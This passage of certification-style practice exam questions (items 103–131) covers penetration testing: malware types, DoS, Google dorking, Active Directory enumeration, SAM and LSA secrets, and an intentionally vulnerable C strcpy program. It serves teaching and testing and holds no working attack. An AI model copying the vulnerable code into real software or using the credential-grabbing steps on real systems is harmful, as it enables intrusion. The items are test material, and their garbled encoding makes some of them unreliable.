locks</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Pick-resistant locks</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Electronic key systems</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">103. You are running known exploits against your network to test for possible vulnerabilities. To test the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">strength of your virus software, you load a test network to mimic your production network. Your software</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">successfully blocks some simple macro and encrypted viruses. You decide to really test the software by</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">using virus code where the code rewrites itself entirely and the signatures change from child to child, but</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the functionality stays the same. What type of virus is this that you are testing?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Polymorphic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Metamorphic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Oligomorhic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Transmorphic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">104. Kyle is performing the final testing of an application he developed for the accounting department.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">commanD. What is he testing at this point?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">#include <stdio .h=""></stdio></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">#include <string .h=""></string></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">int main(int argc, char *argv[])</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">{</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">char buffer[10];</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">if (argc < 2)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">{</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">fprintf(stderr, ¡°USAGE: %s stringn¡±, argv[0]);</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">return 1;</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">}</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">strcpy(buffer, argv[1]);</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">return 0;</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">}</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Buffer overflow</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. SQL injection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Format string bug</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Kernal injection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">105. James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the broadcast address of his network. What type of DoS attack is James testing against his network?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Smurf</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Trinoo</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Fraggle</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. SYN flood</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">106. A packet is sent to a router that does not have the packet destination address in its route table, how will the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">packet get to its properA packet is sent to a router that does not have the packet? destination address in its</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">route table, how will the packet get to its proper destination?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Root Internet servers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Border Gateway Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Gateway of last resort</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Reverse DNS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">107. Jonathan is a network administrator who is currently testing the internal security of his network. He is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">succeed?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Only an HTTPS session can be hijacked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. HTTP protocol does not maintain session</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Only FTP traffic can be hijacked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Only DNS traffic can be hijacked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">108. Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">agreement he signed with the client, Harold is performing research online and seeing how much exposure</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the site has received so far. Harold navigates to google.com and types in the following search.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">link:www.ghttech.net What will this search produce?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. All sites that ghttech.net links to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. All sites that link to ghttech.net</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. All search engines that link to .net domains</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Sites that contain the code: link:www.ghttech.net</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">109. Why is it a good idea to perform a penetration test from the inside?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. It is never a good idea to perform a penetration test from the inside</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Because 70% of attacks are from inside the organization</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. To attack a network from a hacker.s perspective</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. It is easier to hack from the inside</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">110. The objective of this act was to protect consumers personal financial information held by financial</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">institutions and their service providers.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Gramm-Leach-Bliley Act</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Sarbanes-Oxley 2002</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. California SB 1386</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. HIPAA</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">111. You are a security analyst performing reconnaissance on a company you will be carrying out a penetration</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">test for. You conduct a search for IT jobs on Dice.com and find the following information for an open</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">position:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">7+ years experience in Windows Server environment</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">5+ years experience in Exchange 2000/2003 environment Experience with Cisco Pix Firewall, Linksys</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1376 router, Oracle 11i and MYOB v3.4 Accounting software are required MCSA desired,</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">MCSE, CEH preferred</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">No Unix/Linux Experience needed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What is this information posted on the job website considered?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Social engineering exploit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Competitive exploit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Information vulnerability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Trade secret</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">112. Terri works for a security consulting firm that is currently performing a penetration test on First National</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Bank in Tokyo. Terri.s duties include bypassing firewalls and switches to gain access to the network. Terri</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sends an IP packet to one of the company.s switches with ACK bit and the source address of her machine</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">set. What is Terri trying to accomplish by sending this IP packet?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Trick the switch into thinking it already has a session with Terri.s computer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Poison the switch.s MAC address table by flooding it with ACK bits</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Crash the switch with aDoS attack since switches cannot send ACK bits</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Enable tunneling feature on the switch</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">113. What are the security risks of running a ¡°repair¡± installation for Windows XP?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Pressing Shift+F10gives the user administrative rights</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Pressing Shift+F1gives the user administrative rights</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Pressing Ctrl+F10 gives the user administrative rights</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. There are no security risks when running the ¡°repair¡± installation for Windows XP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">114. You have compromised a lower-level administrator account on an Active Directory network of a small</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Poison the DNS records with false records</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Enumerate MX and A records from DNS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Establish a remote connection to the Domain Controller</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Enumerate domain user accounts and built-in groups</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">115. Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">production network. In this honeypot, he has placed a server running Windows Active Directory. He has</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">download sensitive information by clicking on a button. A week later, Jason finds in his network logs how</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Entrapment</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Enticement</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Intruding into ahoneypot is not illegal</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Intruding into a DMZ is not illegal</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">116. Software firewalls work at which layer of the OSI model?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Application</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Transport</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Data Link</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">117. You just passed your ECSA exam and are about to start your first consulting job running security audits for</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">if you remember your ECSA class. He asks about the methodology you will be using to test the company.s</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">network. How would you answer?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Microsoft Methodology</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Google Methodology</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IBM Methodology</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. LPT Methodology</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">118. When setting up a wireless network with multiple access points, why is it important to set each access point</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">on a different channel?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Multiple access points can be set up on the same channel without any issues</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Avoid over-saturation of wireless signals</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. So that the access points will work on differentfreQuencies</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Avoid cross talk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">119. You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What search string will you use to locate them?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. allinurl:¡±exchange/logon.asp¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. intitle:¡±exchange server¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. locate:¡±logon page¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. outlook:¡±search¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">120. Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computer. Where should Harold navigate on the computer to find the file?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. %systemroot%system32LSA</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. %systemroot%system32driversetc</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. %systemroot%repair</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. %systemroot%LSA</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">121. What is kept in the following directory? HKLMSECURITYPolicySecrets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Cached password hashes for the past 20 users</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Service account passwords in plain text</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IAS account names and passwords</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Local store PKI Kerberos certificates</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">122. On Linux/Unix based Web servers, what privilege should the daemon service be run under?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Guest</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Root</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. You cannot determine what privilege runs the daemon service</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Something other than root</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">123. Paul.s company is in the process of undergoing a complete security audit including logical and physical</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">security testing. After all logical tests were performed; it is now time for the physical round to begin. None</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">of the employees are made aware of this round of testing. The security-auditing firm sends in a technician</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">behind them when they access the restricted areas. After entering the main office, he is able to get into the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">server room telling the IT manager that there is a problem with the outlets in that room. What type of attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">has the technician performed?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Tailgating</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Backtrapping</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Man trap attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Fuzzing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">124. What operating system would respond to the following command?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">c:\> nmap -sW 10.10.145.65</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Windows 95</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. FreeBSD</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Windows XP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Mac OS X</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">125. Why are Linux/Unix based computers better to use than Windows computers for idle scanning?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Linux/Unix computers are easier to compromise</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Linux/Unix computers are constantly talking</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Windows computers are constantly talking</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Windows computers will not respond to idle scans</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">126. You work as a penetration tester for Hammond Security Consultants. You are currently working on a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">contract for the state government of CaliforniA. Your next step is to initiate a DoS attack on their network.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Why would you want to initiate a DoS attack on a system you are testing?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Show outdatedeQuipment so it can be replaced</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. List weak points on their network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Use attack as a launching point to penetrate deeper into the network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Demonstrate that no system can be protected againstDoS attacks</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">127. Jim performed a vulnerability analysis on his network and found no potential problems. He runs another</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">utility that executes exploits against his system to verify the results of the vulnerability test. The second</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">utility executes five known exploits against his network in which the vulnerability analysis said were not</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">exploitable. What kind of results did Jim receive from his vulnerability analysis?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. False negatives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. False positives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. True negatives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. True positives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">128. In Linux, what is the smallest possible shellcode?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 24 bytes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 8 bytes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 800 bytes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 80 bytes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">129. Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">of your knowledge, an outside security firm is brought in to assess the network security. Although they</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">found very few issues, they were able to enumerate the model, OS version, and capabilities for all your</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">information on your Cisco routers?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Border Gateway Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Cisco Discovery Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Broadcast System Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Simple Network Management Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">130. George is the network administrator of a large Internet company on the west coast. Per corporate policy,</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">none of the employees in the company are allowed to use FTP or SFTP programs without obtaining</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">approval from the IT department. Few managers are using SFTP program on their computers. Before</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">monitor network traffic, but only SFTP traffic to and from his network.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What filter should George use in Ethereal?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. src port 23 and dst port 23</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. udp port 22 and host 172.16.28.1/24</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. net port 22</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. src port 22 and dst port 22</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">131. Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">anything relateD. What organization should Frank submit the log to find out if it is a new vulnerability or</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">not?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. APIPA</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. IANA</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. CVE</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. RIPE</span></span><br /> <span style="font-family: arial, Verdana, 